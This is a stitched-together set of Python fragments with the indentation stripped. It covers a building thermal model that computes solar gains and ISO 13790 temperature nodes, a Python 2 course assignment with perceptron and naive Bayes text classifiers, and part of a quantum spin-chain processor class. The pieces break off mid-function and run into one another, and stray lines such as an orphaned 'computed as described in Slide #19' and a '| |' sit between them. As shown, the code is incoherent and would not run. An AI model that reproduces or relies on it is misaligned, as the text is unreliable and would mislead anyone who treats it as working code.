#Glazed walls incident radiation
#SHGC for direct solar radiation without solar shadings
Surface.SHGC_dir1[i] = Surface.SHGC1[i] * VARSHGC(Surface.theta[i], p_SHGC)
#SHGC for hemispherical solar radiation without solar shadings
Surface.SHGC_hemis1[i] = Surface.SHGC1[i] * f_hemis
#SHGC for direct solar radiation with solar shadings
Surface.SHGC_dir2[i] = Surface.SHGC2[i] * VARSHGC(Surface.theta[i], p_SHGC)
#SHGC for hemispherical solar radiation with solar shadings
Surface.SHGC_hemis2[i] = Surface.SHGC2[i] * f_hemis
#Components of the solar factor of a window
# without solar protection
Surface.Sp11_dir[i] = f_sg11 * Surface.SHGC_dir1[i] #Assumption when no information on the glazing
Surface.Sp21_dir[i] = f_sg21 * Surface.SHGC_dir1[i]
Surface.Sp31_dir[i] = Surface.SHGC_dir1[i] - Surface.Sp11_dir[i] - Surface.Sp21_dir[i]
Surface.Sp11_hemis[i] = f_sg11 * Surface.SHGC_hemis1[i] #Assumption when no information on the glazing
Surface.Sp21_hemis[i] = f_sg21 * Surface.SHGC_hemis1[i]
Surface.Sp31_hemis[i] = Surface.SHGC_hemis1[i] - Surface.Sp11_hemis[i] - Surface.Sp21_hemis[i]
# with solar ventilated protection
Surface.Sp12_dir[i] = f_sg12 * Surface.SHGC_dir2[i]
Surface.Sp22_dir[i] = f_sg22 * Surface.SHGC_dir2[i]
Surface.Sp32_dir[i] = Surface.SHGC_dir2[i] - Surface.Sp12_dir[i] - Surface.Sp22_dir[i]
Surface.Sp12_hemis[i] = f_sg12 * Surface.SHGC_hemis2[i]
Surface.Sp22_hemis[i] = f_sg22 * Surface.SHGC_hemis2[i]
Surface.Sp32_hemis[i] = Surface.SHGC_hemis2[i] - Surface.Sp12_hemis[i] - Surface.Sp22_hemis[i]
Surface.Q_dot_sol_gl_dir[i] = A_t_gl[i] * Surface.I_dir_w[i] * ((1 - Surface.f_shad[i]) *
Surface.Sp21_dir[i] + Surface.f_shad[i]
* Surface.Sp22_dir[i])
Surface.Q_dot_sol_gl_hemis[i] = A_t_gl[i] * Surface.I_hemis_w[i] * ((1 - Surface.f_shad[i]) *
Surface.Sp21_hemis[i] + Surface.f_shad[i]
* Surface.Sp22_hemis[i])
#Direct solar gain through windows
Surface.Q_dot_sd_dir[i] = Surface.I_dir_w[i] * A_t_gl[i] * ((1 - Surface.f_shad[i]) * Surface.Sp11_dir[i]
+ Surface.f_shad[i] * Surface.Sp12_dir[i])
Surface.Q_dot_sd_hemis[i] = Surface.I_hemis_w[i] * A_t_gl[i] * ((1 - Surface.f_shad[i]) * Surface.Sp11_hemis[i]
+ Surface.f_shad[i] * Surface.Sp12_hemis[i])
#Solar gain due to the increase in temperature of the
#ventilated air cavity
Surface.Q_dot_svl_dir[i] = A_t_gl[i] * (Surface.Sp31_dir[i] * (1 - Surface.f_shad[i]) * Surface.I_dir_w[i]
+ Surface.Sp32_dir[i] * Surface.f_shad[i] * Surface.I_dir_w[i])
Surface.Q_dot_svl_hemis[i] = A_t_gl[i] * (Surface.Sp31_hemis[i] * (1 - Surface.f_shad[i]) * Surface.I_hemis_w[i]
+ Surface.Sp32_hemis[i] * Surface.f_shad[i] * Surface.I_hemis_w[i])
Q_dot_sol_h_tot = Surface.Q_dot_sol_h.sum()
Q_dot_sol_l_tot = Surface.Q_dot_sol_l.sum()
Q_dot_sol_gl_tot = Surface.Q_dot_sol_gl_dir.sum() + Surface.Q_dot_sol_gl_hemis.sum()
Q_dot_sd_tot = Surface.Q_dot_sd_dir.sum() + Surface.Q_dot_sd_hemis.sum()
Q_dot_svl_tot = Surface.Q_dot_svl_dir.sum() + Surface.Q_dot_svl_hemis.sum()
else:
# Surface.I_tot_w = zeros((1, n_walls))
Surface.I_tot_w = pd.Series([0 for x in range(0,n_walls)])
Q_dot_sol_h_tot = 0
Q_dot_sol_l_tot = 0
Q_dot_sol_gl_tot = 0
Q_dot_sd_tot = 0
Q_dot_svl_tot = 0
#INFRARED EMISSION
if (ori[i]=='F') or (ori[i]=='C'):
#light walls
#Q_dot_IR_l(ori)=(A_v_lopw(ori)*1/2*(1+cos(beta))*epsilon_ir_lopw*I_ir_h*U_lopw+A_t_gl(ori)*1/2*(1+cos(beta))*epsilon_ir_gl*I_ir_h*U_gl)/h_e_l ;
# Heavy opaque walls
#Q_dot_IR_h(ori)=A_v_hopw(ori)*epsilon_ir_hopw*I_ir_h*1/2*(1+cos(beta))*U_hopw/h_e_h;
#light walls
Surface.Q_dot_IR_l[i] = 0
# Heavy opaque walls
Surface.Q_dot_IR_h[i] = 0
else:
beta_w = slope[i] * pi / 180
#light walls
Surface.Q_dot_IR_l[i] = (A_v_lopw[i] * 1 / 2 * (1 + cos(beta_w)) * epsilon_ir_lopw[i] * I_ir_h +
A_t_gl[i] * 1/2 * (1 + cos(beta_w)) * epsilon_ir_gl[i] * I_ir_h)
# Heavy opaque walls
Surface.Q_dot_IR_h[i] = A_v_hopw[i] * epsilon_ir_hopw[i] * I_ir_h * 1 / 2 * (1 + cos(beta_w))
Q_dot_IR_l_tot = Surface.Q_dot_IR_l.sum()
Q_dot_IR_h_tot = Surface.Q_dot_IR_h.sum()
#SOLAR GAINS
Q_dot_sl_tot = Q_dot_sol_l_tot + Q_dot_sol_gl_tot - Q_dot_IR_l_tot
Q_dot_sh_tot = Q_dot_sol_h_tot - Q_dot_IR_h_tot
#Total transmitted solar radiation
I_tr_tot = (Q_dot_sol_gl_tot + Q_dot_sd_tot + Q_dot_svl_tot) / (sum(A_t_gl) + zero)
return Q_dot_sl_tot, Q_dot_sh_tot, Q_dot_sd_tot, Q_dot_svl_tot, Surface.I_tot_w, I_tr_tot, Q_dot_IR_l_tot, Q_dot_IR_h_tot, \
Q_dot_sol_l_tot, Q_dot_sol_h_tot, Q_dot_sol_gl_tot
def TEMP_OUT(error=None, zero=None, Q_dot_sl=None, Q_dot_sh=None, T_e=None, H_tr_em=None, H_tr_es=None, H_tr_ms=None,
h_e_l=None, h_e_h=None, A_lopw_t=None, A_gl_t=None, A_fr_t=None, A_hopw_t=None):
if abs(Q_dot_sl) < error:
T_es = T_e
else:
T_es = T_e + Q_dot_sl / (h_e_l * (A_lopw_t + A_gl_t + A_fr_t) + zero)
#T_es=T_e+Q_dot_sl/(H_tr_es+zero);
if abs(Q_dot_sh) < error:
T_em = T_e
else:
#T_em=T_e+Q_dot_sh/(H_tr_em+H_tr_ms+zero);
T_em = T_e + Q_dot_sh / (h_e_h * A_hopw_t + zero)
return T_es, T_em
def TEMP(zero=None, h_ci=None, h_rs=None, T_em=None, T_es=None, T_ve_sup=None, H_ve=None, H_tr_is=None, H_tr_es=None,
H_tr_ms=None, H_tr_em=None, C_m=None, Q_dot_i=None, Q_dot_s=None, Q_dot_m=None, T_m_i=None):
#ISO 13790: Determination of the air and operative temperatures for a
#given value of Q_dot_hc
H_tr_1 = 1 / (1 / (H_ve + zero) + 1 / (H_tr_is + zero))
H_tr_2 = H_tr_1 + H_tr_es
H_tr_3 = 1 / (1 / H_tr_2 + 1 / H_tr_ms + zero)
#Total mass node flow rate
Q_dot_m_tot = Q_dot_m + H_tr_em * T_em + H_tr_3 * (Q_dot_s + H_tr_es * T_es + H_tr_1 * (Q_dot_i / (H_ve + zero) +
T_ve_sup)) / H_tr_2
#Final thermal mass temperature (Euler integration method)
T_m_f = (T_m_i * (C_m / 3600 - 1 / 2 * (H_tr_3 + H_tr_em)) + Q_dot_m_tot) / (C_m / 3600 + 1 / 2 * (H_tr_3 + H_tr_em))
#Average value mass temperature
T_m = (T_m_f + T_m_i) / 2
#Central node temperature (mean of indoor air and radiant temperatures)
T_s = (H_tr_ms * T_m + Q_dot_s + H_tr_es * T_es + H_tr_1 * (T_ve_sup + Q_dot_i / (H_ve + zero))) / (H_tr_ms +
H_tr_es + H_tr_1)
#Air indoor temperature
T_i = (H_tr_is * T_s + H_ve * T_ve_sup + Q_dot_i) / (H_tr_is + H_ve + zero)
#Operative temperature
T_op = 0.5 * (1 + h_ci / h_rs) * T_s + (1 - 0.5 * (1 + h_ci / h_rs)) * T_i
#Mean radiant temperature
T_rm = 2 * T_op - T_i
return Q_dot_m_tot, T_m, T_s, T_i, T_op, T_rm, T_m_f
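def _example_temp_step():
    # Hypothetical usage sketch of TEMP() for one hourly step of the ISO 13790
    # 5R1C network. Every numerical value below is invented for illustration
    # and is not a calibrated building parameter.
    Q_dot_m_tot, T_m, T_s, T_i, T_op, T_rm, T_m_f = TEMP(
        zero=1e-6, h_ci=2.5, h_rs=5.5,
        T_em=12.0, T_es=14.0, T_ve_sup=16.0,
        H_ve=50.0, H_tr_is=500.0, H_tr_es=40.0,
        H_tr_ms=800.0, H_tr_em=60.0,
        C_m=1.65e7,                 # assumed thermal capacity in J/K
        Q_dot_i=200.0, Q_dot_s=300.0, Q_dot_m=150.0,
        T_m_i=20.0)                 # mass temperature at the start of the step
    # T_m_f would be carried over as T_m_i for the next hourly step.
    return T_i, T_op, T_m_f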
def HEATGAINS(f_sa=None, A_gl=None, A_t=None, A_m=None, Q_dot_sys=None, f_occ_c=None, Q_dot_occ=None, f_appl_c=None,
Q_dot_appl=None, f_light_c=None, Q_dot_light=None, f_proc_c=None, Q_dot_proc=None, Q_dot_th_recov=None,
f_h_c=None, f_c_c=None, H_tr_es=None, h_is=None, Q_dot_svl_tot=None, Q_dot_s_d_tot=None):
#Heat flow rate due to internal heat gains
#Q_dot_occ: Sensible heat flow rate from occupants
#Q_dot_appl: Sensible heat flow rate from electrical appliances
#Q_dot_light: Sensible heat flow rate from lighting
#Q_dot_proc: Sensible heat flow rate from process
#Q_dot_proc: Sensible heat flow rate from processes
#Radiative/Convective split of internal heat gains
#Radiative/Convective split of heating/cooling power
Q_dot_h = max(0, Q_dot_sys)
Q_dot_c = min(0, Q_dot_sys)
Q_dot_h_c = f_h_c * Q_dot_h
Q_dot_h_r = (1 - f_h_c) * Q_dot_h
Q_dot_c_c = f_c_c * Q_dot_c
Q_dot_c_r = (1 - f_c_c) * Q_dot_c
computed as described in Slide #19 of:
## http://www.cs.umd.edu/class/fall2016/cmsc723/slides/slides_02.pdf
def get_features_for_label(instance,label,class_labels):
num_labels = len(class_labels)
num_feats = len(instance)
feats = np.zeros(len(instance)*num_labels+1)
assert len(feats[num_feats*label:num_feats*label+num_feats]) == len(instance)
feats[num_feats*label:num_feats*label+num_feats] = instance
return feats
## get the predicted label for a given instance
## the predicted label is the one with the highest dot product of theta*feature_vector
## return the predicted label, the dot product scores for all labels and the features computed for all labels for that instance
def get_predicted_label(inst,class_labels,theta):
all_labels_scores = {}
all_labels_features = {}
for lbl in class_labels:
feat_vec = get_features_for_label(inst,lbl,class_labels)
assert len(feat_vec) == len(theta)
all_labels_scores[lbl] = np.dot(feat_vec,theta)
predicted_label = max(all_labels_scores.iteritems(), key=operator.itemgetter(1))[0]
return predicted_label
## train the perceptron by iterating over the entire training dataset
## the algorithm is an implementation of the pseudocode from Slide #23 of:
## http://www.cs.umd.edu/class/fall2016/cmsc723/slides/slides_03.pdf
def train_perceptron(train_features,train_labels,class_labels,num_features):
NO_MAX_ITERATIONS = 20
np.random.seed(0)
theta = np.zeros(num_features)
print '# Training Instances:',len(train_features)
num_iterations = 0
cnt_updates_total = 0
cnt_updates_prev = 0
m = np.zeros(num_features)
print '# Total Updates / # Current Iteration Updates:'
for piter in range(NO_MAX_ITERATIONS):
shuffled_indices = np.arange(len(train_features))
np.random.shuffle(shuffled_indices)
cnt_updates_crt = 0
for i in shuffled_indices:
inst = train_features[i]
actual_label = train_labels[i]
predicted_label = get_predicted_label(inst,class_labels,theta)
if predicted_label != actual_label:
cnt_updates_total += 1
cnt_updates_crt += 1
theta = theta + get_features_for_label(inst,actual_label,class_labels) - get_features_for_label(inst,predicted_label,class_labels)
m = m + theta
num_iterations += 1
print cnt_updates_total,'/',cnt_updates_crt
if cnt_updates_crt == 0:
break
theta = m/cnt_updates_total
print '# Iterations:',piter
print '# Iterations over instances:',num_iterations
print '# Total Updates:',cnt_updates_total
return theta
## return the predictions of the perceptron on a test set
def test_perceptron(theta,test_features,test_labels,class_labels):
predictions = []
for inst in test_features:
predicted_label = get_predicted_label(inst,class_labels,theta)
predictions.append(predicted_label)
return predictions
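## Tiny illustrative sketch (not part of the assignment code, Python 2 like
## the rest of this file): shows the one-block-per-class feature layout and a
## prediction with a hand-made theta. All numbers are made up.
def _toy_perceptron_example():
    class_labels = [0, 1]                   # two classes
    instance = np.array([1.0, 0.0, 2.0])    # a 3-dimensional bag-of-words vector
    ## the instance is copied into the block of slots owned by label 1
    feats_for_label_1 = get_features_for_label(instance, 1, class_labels)
    ## a theta that rewards label 1 whenever the third word is present
    theta = np.zeros(len(instance) * len(class_labels) + 1)
    theta[len(instance) + 2] = 1.0
    predicted = get_predicted_label(instance, class_labels, theta)
    return feats_for_label_1, predicted     # predicted is 1 here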
"""
Trains a perceptron model with bag of words features and computes the accuracy on the test set
train_texts, train_targets, train_labels are as described in read_dataset above
The same applies to the rest of the parameters.
"""
def run_bow_perceptron_classifier(train_texts, train_targets,train_labels,
dev_texts, dev_targets,dev_labels, test_texts, test_targets, test_labels):
all_words_idx = extract_all_words(train_texts)
all_labels_idx = extract_all_labels(train_labels)
num_features = len(all_words_idx.keys())*len(all_labels_idx.keys())+1
class_labels = all_labels_idx.values()
train_features = extract_features(all_words_idx,all_labels_idx,train_texts)
train_labels = map(lambda e: all_labels_idx[e],train_labels)
test_features = extract_features(all_words_idx,all_labels_idx,test_texts)
test_labels = map(lambda e: all_labels_idx[e],test_labels)
for l in class_labels:
inst = train_features[0]
ffl = get_features_for_label(inst,l,class_labels)
assert False not in (inst == ffl[l*len(inst):(l+1)*len(inst)])
theta = train_perceptron(train_features,train_labels,class_labels,num_features)
test_predictions = test_perceptron(theta,test_features,test_labels,class_labels)
eval_test = eval_performance(test_labels,test_predictions)
inverse_labels_index = {}
for k in all_labels_idx.keys():
inverse_labels_index[all_labels_idx[k]] = k
test_predictions_names = map(lambda e: inverse_labels_index[e],test_predictions)
with open('q3p3.txt', 'wb') as file_output:
for each_label in test_predictions_names:
file_output.write(each_label+'\n')
return ('test-micro=%d%%, test-macro=%d%%' % (int(eval_test[0]*100),int(eval_test[1]*100)))
"""
Trains a naive bayes model with bag of words features + two additional features
and computes the accuracy on the test set
train_texts, train_targets, train_labels are as described in read_dataset above
The same applies to the rest of the parameters.
"""
def run_extended_bow_naivebayes_classifier(train_texts, train_targets,train_labels,
dev_texts, dev_targets,dev_labels, test_texts, test_targets, test_labels):
# control variables
improved = True
alpha = 0.04
silent = True
RUN_EXP = 'Both' # set to 'A', 'B', 'Both', or None
# feature extensions (A)
if RUN_EXP == 'A':
train_features, dev_features, test_features = get_feature_A(train_texts, train_targets, train_labels,
dev_texts, dev_targets, dev_labels,
test_texts, test_targets, test_labels)
for idx, each_text in enumerate(train_texts):
each_text.append(str(float(train_features[idx])))
for idx, each_text in enumerate(dev_texts):
each_text.append(str(float(dev_features[idx])))
for idx, each_text in enumerate(test_texts):
each_text.append(str(float(test_features[idx])))
# feature extensions (B)
elif RUN_EXP == 'B':
train_features, dev_features, test_features = get_feature_B(train_texts, train_targets, train_labels,
dev_texts, dev_targets, dev_labels,
test_texts, test_targets, test_labels)
for idx, each_text in enumerate(train_texts):
each_text.append(str(int(train_features[idx])))
for idx, each_text in enumerate(dev_texts):
each_text.append(str(int(dev_features[idx])))
for idx, each_text in enumerate(test_texts):
each_text.append(str(int(test_features[idx])))
# feature extensions with both two A and B
elif RUN_EXP == 'Both':
train_features_A, dev_features_A, test_features_A = get_feature_A(train_texts, train_targets, train_labels,
dev_texts, dev_targets, dev_labels,
test_texts, test_targets, test_labels)
train_features_B, dev_features_B, test_features_B = get_feature_B(train_texts, train_targets, train_labels,
dev_texts, dev_targets, dev_labels,
test_texts, test_targets, test_labels)
for idx, each_text in enumerate(train_texts):
each_text.append(str(float(train_features_A[idx])))
each_text.append(str(int(train_features_B[idx])))
for idx, each_text in enumerate(dev_texts):
each_text.append(str(float(dev_features_A[idx])))
each_text.append(str(int(dev_features_B[idx])))
for idx, each_text in enumerate(test_texts):
each_text.append(str(float(test_features_A[idx])))
each_text.append(str(int(test_features_B[idx])))
else:
train_features, dev_features, test_features = None, None, None
if not silent:
print ' extension of the Naive Bayes classifier w. feature set: [%s] ' % (RUN_EXP)
print '------------------------------------------------------------------------------------------'
# Part 2.1 (c_s/c_sw)
c_s = dict.fromkeys(set(train_labels), 0)
multiples = list(itertools.product(c_s.keys(), ['time', 'loss', 'export']))
c_sw = dict.fromkeys(multiples, 0)
t_w = [each_word for each_text in train_texts for each_word in each_text]
multiples = list(itertools.product(c_s.keys(), t_w))
t_sw = dict.fromkeys(multiples, 0)
for idx, label in enumerate(train_labels):
cur_text = train_texts[idx]
# compute c_s
c_s[label] += len(cur_text)
# compute c_sw
time_cnt = cur_text.count('time')
loss_cnt = cur_text.count('loss')
export_cnt = cur_text.count('export')
c_sw[(label, 'time')] += time_cnt
c_sw[(label, 'loss')] += loss_cnt
c_sw[(label, 'export')] += export_cnt
# compute t_sw: total occurrences of each (label, word) pair
for each_word in cur_text:
t_sw[(label, each_word)] += 1
# total # of distinct words: will be used for smoothing
t_dw = Counter(t_w)
if not silent:
print '{:<11} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} |'.\
format('s', 'cord', 'division', 'formation', 'phone', 'product', 'text')
print '------------------------------------------------------------------------------------------'
print '{:<11} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} |'.\
format('c(s)', c_s['cord'], c_s['division'], c_s['formation'], c_s['phone'], c_s['product'], c_s['text'])
print '{:<11} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} |'.\
format('c(s,time)', c_sw[('cord', 'time')], c_sw[('division', 'time')], c_sw[('formation', 'time')], \
c_sw[('phone', 'time')], c_sw[('product', 'time')], c_sw[('text', 'time')])
print '{:<11} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} |'.\
format('c(s,loss)', c_sw[('cord', 'loss')], c_sw[('division', 'loss')], c_sw[('formation', 'loss')], \
c_sw[('phone', 'loss')], c_sw[('product', 'loss')], c_sw[('text', 'loss')])
print '{:<11} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} | {:<10} |'.\
format('c(s,export)', c_sw[('cord', 'export')], c_sw[('division', 'export')], c_sw[('formation', 'export')], \
c_sw[('phone', 'export')], c_sw[('product', 'export')], c_sw[('text', 'export')])
print '------------------------------------------------------------------------------------------'
print ' total distinct words: %d ' % (len(t_dw.keys()))
# Part 2.2 (p_s/p_ws)
total_occurances = float(sum(c_s.values()))
label_count = Counter(train_labels)
p_s = {key: (value / float( sum( label_count.values() )) ) for key, value in label_count.iteritems()}
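# Additive (Lidstone/Laplace) smoothing used below when 'improved' is set:
#   p(w|s) = (c(s,w) + alpha) / (c(s) + alpha * |V|)
# where |V| is the number of distinct words, so unseen (label, word)
# pairs get a small non-zero probability instead of zero.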
if improved:
p_ws = {key: ( (value + alpha) / \
(float(c_s[key[0]]) + alpha*len(t_dw.keys())) ) \
for key, value in c_sw.iteritems()}
t_ws = {key: ( (value + alpha) / \
(float(c_s[key[0]]) + alpha*len(t_dw.keys())) ) \
for key, value in t_sw.iteritems()}
else:
p_ws = {key: (value / float(c_s[key[0]])) for key, value in c_sw.iteritems()}
t_ws = {key: (value / float(c_s[key[0]])) for key, value in t_sw.iteritems()}
# normalization steps
norm_denominators = {
'time': 0.0,
'loss': 0.0,
'export': 0.0
}
for key, value in p_ws.iteritems():
norm_denominators[key[1]] += value
p_ws_norm = {key: (value / norm_denominators[key[1]]) for key, value in p_ws.iteritems()}
p_ws = p_ws_norm
if not silent:
print '------------------------------------------------------------------------------------------'
print '{:<11} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} |'.\
format('p(s)', p_s['cord'], p_s['division'], p_s['formation'], p_s['phone'], p_s['product'], p_s['text'])
print '{:<11} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} |'.\
format('p(time|s)', p_ws[('cord', 'time')], p_ws[('division', 'time')], p_ws[('formation', 'time')], \
p_ws[('phone', 'time')], p_ws[('product', 'time')], p_ws[('text', 'time')])
print '{:<11} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} |'.\
format('p(loss|s)', p_ws[('cord', 'loss')], p_ws[('division', 'loss')], p_ws[('formation', 'loss')], \
p_ws[('phone', 'loss')], p_ws[('product', 'loss')], p_ws[('text', 'loss')])
print '{:<11} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} |'.\
format('p(export|s)', p_ws[('cord', 'export')], p_ws[('division', 'export')], p_ws[('formation', 'export')], \
p_ws[('phone', 'export')], p_ws[('product', 'export')], p_ws[('text', 'export')])
# Part 2.3 (p_sxd, on the 1st line on test set)
p_sxd = dict.fromkeys(c_s.keys(), 0.0)
lp_sxd = dict.fromkeys(c_s.keys(), 0.0)
cur_text = dev_texts[0]
for key in p_sxd.keys():
# compute p for each class
if improved:
tp_sxd = p_s[key]
tlp_sxd = log(p_s[key])
else:
tp_sxd = p_s[key]
# compute for each word
for each_word in cur_text:
if t_ws.has_key((key, each_word)):
if improved:
tp_sxd *= t_ws[(key, each_word)]
tlp_sxd += log(t_ws[(key, each_word)])
else:
tp_sxd *= t_ws[(key, each_word)]
# add to the dict
if improved:
p_sxd[key] = tp_sxd
lp_sxd[key] = tlp_sxd
else:
p_sxd[key] = tp_sxd
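# Working in log-space (lp_sxd) avoids numerical underflow: the product of
# many small word probabilities becomes a sum of their logarithms.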
if not silent:
print '------------------------------------------------------------------------------------------'
print ' %s | %s | %s | %s | %s | %s | %s |' % \
('p(s|X)', p_sxd['cord'], p_sxd['division'], p_sxd['formation'], \
p_sxd['phone'], p_sxd['product'], p_sxd['text'])
print '------------------------------------------------------------------------------------------'
print ' 1st label in dev : %s ' % (dev_labels[0])
print ' 1st text in dev[:5]: %s ' % (dev_texts[0][:5])
if improved:
print '------------------------------------------------------------------------------------------'
print '{:<11} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} | {:<10.8f} |'.\
format('log(p(s|X))', lp_sxd['cord'], lp_sxd['division'], lp_sxd['formation'], \
lp_sxd['phone'], lp_sxd['product'], lp_sxd['text'])
# Part 2.4: compute all the prob on the test dataset
p_sx = list()
for idx, text in enumerate(test_texts):
| |
start + end - i])
i += 1
elif (end - start) < N - 1:
"""
If the resolving has to go backwards, the path is first
mapped to a separate circuit and then copied back to the
original circuit.
"""
temp = QubitCircuit(N - end + start)
i = 0
while i < (N - end + start):
if (N + start - end - i - i == 1 and
(N - end + start + 1) % 2 == 0):
if end == gate.controls[0]:
temp.add_gate(gate.name, targets=[i],
controls=[i + 1])
else:
temp.add_gate(gate.name, targets=[i + 1],
controls=[i])
elif (N + start - end - i - i == 2 and
(N - end + start + 1) % 2 == 1):
temp.add_gate("SWAP", targets=[i, i + 1])
if end == gate.controls[0]:
temp.add_gate(gate.name, targets=[i + 2],
controls=[i + 1])
else:
temp.add_gate(gate.name, targets=[i + 1],
controls=[i + 2])
temp.add_gate("SWAP", [i, i + 1])
i += 1
else:
temp.add_gate("SWAP", [i, i + 1])
temp.add_gate("SWAP",
[N + start - end - i - 1,
N + start - end - i])
i += 1
j = 0
for gate in temp.gates:
if (j < N - end - 2):
if gate.name in ["CNOT", "CSIGN"]:
qc_t.add_gate(gate.name, end + gate.targets[0],
end + gate.controls[0])
else:
qc_t.add_gate(gate.name,
[end + gate.targets[0],
end + gate.targets[1]])
elif (j == N - end - 2):
if gate.name in ["CNOT", "CSIGN"]:
qc_t.add_gate(gate.name, end + gate.targets[0],
(end + gate.controls[0]) % N)
else:
qc_t.add_gate(gate.name,
[end + gate.targets[0],
(end + gate.targets[1]) % N])
else:
if gate.name in ["CNOT", "CSIGN"]:
qc_t.add_gate(gate.name,
(end + gate.targets[0]) % N,
(end + gate.controls[0]) % N)
else:
qc_t.add_gate(gate.name,
[(end + gate.targets[0]) % N,
(end + gate.targets[1]) % N])
j = j + 1
elif (end - start) == N - 1:
qc_t.add_gate(gate.name, gate.targets, gate.controls)
elif gate.name in swap_gates:
start = min([gate.targets[0], gate.targets[1]])
end = max([gate.targets[0], gate.targets[1]])
if (setup == "linear" or
(setup == "circular" and (end - start) <= N // 2)):
i = start
while i < end:
if (start + end - i - i == 1 and
(end - start + 1) % 2 == 0):
qc_t.add_gate(gate.name, [i, i + 1])
elif ((start + end - i - i) == 2 and
(end - start + 1) % 2 == 1):
qc_t.add_gate("SWAP", [i, i + 1])
qc_t.add_gate(gate.name, [i + 1, i + 2])
qc_t.add_gate("SWAP", [i, i + 1])
i += 1
else:
qc_t.add_gate("SWAP", [i, i + 1])
qc_t.add_gate("SWAP", [start + end - i - 1,
start + end - i])
i += 1
else:
temp = QubitCircuit(N - end + start)
i = 0
while i < (N - end + start):
if (N + start - end - i - i == 1 and
(N - end + start + 1) % 2 == 0):
temp.add_gate(gate.name, [i, i + 1])
elif (N + start - end - i - i == 2 and
(N - end + start + 1) % 2 == 1):
temp.add_gate("SWAP", [i, i + 1])
temp.add_gate(gate.name, [i + 1, i + 2])
temp.add_gate("SWAP", [i, i + 1])
i += 1
else:
temp.add_gate("SWAP", [i, i + 1])
temp.add_gate("SWAP", [N + start - end - i - 1,
N + start - end - i])
i += 1
j = 0
for gate in temp.gates:
if(j < N - end - 2):
qc_t.add_gate(gate.name, [end + gate.targets[0],
end + gate.targets[1]])
elif(j == N - end - 2):
qc_t.add_gate(gate.name,
[end + gate.targets[0],
(end + gate.targets[1]) % N])
else:
qc_t.add_gate(gate.name,
[(end + gate.targets[0]) % N,
(end + gate.targets[1]) % N])
j = j + 1
else:
qc_t.add_gate(gate.name, gate.targets, gate.controls,
gate.arg_value, gate.arg_label)
return qc_t
def eliminate_auxillary_modes(self, U):
return U
def optimize_circuit(self, qc):
"""
Take a quantum circuit/algorithm and convert it into the
optimal form/basis for the desired physical system.
Parameters
----------
qc: :class:`.QubitCircuit`
Takes the quantum circuit to be implemented.
Returns
-------
qc: :class:`.QubitCircuit`
The circuit representation with elementary gates
that can be implemented in this model.
"""
self.qc0 = qc
self.qc1 = self.adjacent_gates(self.qc0)
self.qc2 = self.qc1.resolve_gates(
basis=["SQRTISWAP", "ISWAP", "RX", "RZ"])
return self.qc2
class LinearSpinChain(SpinChain):
"""
A processor based on the physical implementation of
a linear spin chain qubits system.
The available Hamiltonian of the system is predefined.
The processor can simulate the evolution under the given
control pulses either numerically or analytically.
Parameters
----------
N: int
The number of qubits in the system.
correct_global_phase: float
Save the global phase, the analytical solution
will track the global phase.
It has no effect on the numerical solution.
sx: int or list
The delta for each of the qubits in the system.
sz: int or list
The epsilon for each of the qubits in the system.
sxsy: int or list
The interaction strength for each of the qubit pair in the system.
t1: list or float, optional
Characterize the decoherence of amplitude damping for
each qubit.
t2: list of float, optional
Characterize the decoherence of dephasing for
each qubit.
"""
def __init__(self, N, correct_global_phase=True,
sx=0.25, sz=1.0, sxsy=0.1, t1=None, t2=None):
super(LinearSpinChain, self).__init__(
N, correct_global_phase=correct_global_phase,
sx=sx, sz=sz, sxsy=sxsy, t1=t1, t2=t2)
self.set_up_params(sx=sx, sz=sz, sxsy=sxsy)
self.set_up_ops(N)
def set_up_ops(self, N):
super(LinearSpinChain, self).set_up_ops(N)
def set_up_params(self, sx, sz, sxsy):
# Doc same as in the parent class
super(LinearSpinChain, self).set_up_params(sx, sz)
sxsy_para = 2 * np.pi * self.to_array(sxsy, self.N-1)
self._params["sxsy"] = sxsy_para
@property
def sxsy_ops(self):
return self.ctrls[2*self.N: 3*self.N-1]
@property
def sxsy_u(self):
return self.coeffs[2*self.N: 3*self.N-1]
def load_circuit(
self, qc, schedule_mode="ASAP", compiler=None):
return super(LinearSpinChain, self).load_circuit(
qc, "linear", schedule_mode=schedule_mode, compiler=compiler)
def get_operators_labels(self):
"""
Get the labels for each Hamiltonian.
It is used in the method ``plot_pulses``.
It is a 2-d nested list; in the plot,
a different color will be used for each sublist.
"""
return ([[r"$\sigma_x^%d$" % n for n in range(self.N)],
[r"$\sigma_z^%d$" % n for n in range(self.N)],
[r"$\sigma_x^%d\sigma_x^{%d} + \sigma_y^%d\sigma_y^{%d}$"
% (n, n + 1, n, n + 1) for n in range(self.N - 1)],
])
def adjacent_gates(self, qc):
return super(LinearSpinChain, self).adjacent_gates(qc, "linear")
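def _example_adjacent_gates():
    # Hypothetical usage sketch (not part of the library): map a CNOT between
    # non-neighbouring qubits onto nearest-neighbour operations for a linear
    # chain. Assumes the QubitCircuit class used elsewhere in this module.
    qc = QubitCircuit(3)
    qc.add_gate("CNOT", controls=[0], targets=[2])
    processor = LinearSpinChain(3)
    qc_adjacent = processor.adjacent_gates(qc)
    # qc_adjacent should now contain only SWAPs and two-qubit gates acting on
    # neighbouring qubits, as produced by the parent adjacent_gates with
    # setup="linear".
    return qc_adjacent.gates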
class CircularSpinChain(SpinChain):
"""
A processor based on the physical implementation of
a circular spin chain qubits system.
The available Hamiltonian of the system is predefined.
The processor can simulate the evolution under the given
control pulses either numerically or analytically.
Parameters
----------
N: int
The number of qubits in the system.
correct_global_phase: float
Save the global phase, the analytical solution
will track the global phase.
It has no effect on the numerical solution.
sx: int or list
The delta for each of the qubits in the system.
sz: int or list
The epsilon for each of the qubits in the system.
sxsy: int or list
The interaction strength for each of the qubit pair in the system.
t1: list or float, optional
Characterize the decoherence of amplitude damping for
each qubit.
t2: list of float, optional
Characterize the decoherence of dephasing for
each qubit.
"""
